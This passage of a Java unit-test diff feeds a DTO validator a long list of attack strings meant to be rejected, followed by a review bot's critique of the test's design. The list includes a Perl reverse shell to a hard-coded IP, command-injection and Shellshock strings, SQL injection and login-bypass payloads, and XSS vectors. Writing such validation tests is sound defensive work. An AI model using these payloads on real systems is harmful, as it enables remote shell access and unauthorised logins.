\"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use 
Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + 
"admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for TipoPacoteDTOResponse") + public void testSecurityVulnerabilities(String nome) { + TipoPacoteDTOSaveRequest response = new TipoPacoteDTOSaveRequest(nome); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + +} \ No newline at end of file
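Review bot: `assertFalse(violations.isEmpty())` in testSecurityVulnerabilities cannot distinguish the injection filter from the length limit, and the first test in this file shows that a 20-character name (`ThisNameIsWayTooLong`) is already rejected on length alone, so most of the long command-injection, curl and SQL payloads here would keep passing even if the character whitelist on `nome` were removed. Assert on the constraint that actually fired, e.g. `assertTrue(violations.stream().anyMatch(v -> v.getConstraintDescriptor().getAnnotation().annotationType() == Pattern.class), "whitelist did not reject: " + nome);` (assuming the whitelist is a `@Pattern` on TipoPacoteDTOSaveRequest; adapt to whatever constraint it declares), or keep every payload below the size limit. Note also that `'` is the quote character for `@CsvSource`, so rows like `"'|id'"` reach the test as `|id`, rows such as `"'|id;', 1"` and `"'',"` carry a stray second column that JUnit ignores, and rows with unbalanced embedded quotes such as `"';system(\'id\')', 1"` may be parsed differently from what was intended — `@ValueSource(strings = {...})` would deliver the payloads verbatim. `@SpringBootTest` boots the whole application context for what is a plain Bean Validation test; `Validation.buildDefaultValidatorFactory()` works without Spring, so the annotation can be dropped and the `ValidatorFactory` closed in an `@AfterEach`. Finally, the `@DisplayName` says TipoPacoteDTOResponse while the method validates TipoPacoteDTOSaveRequest.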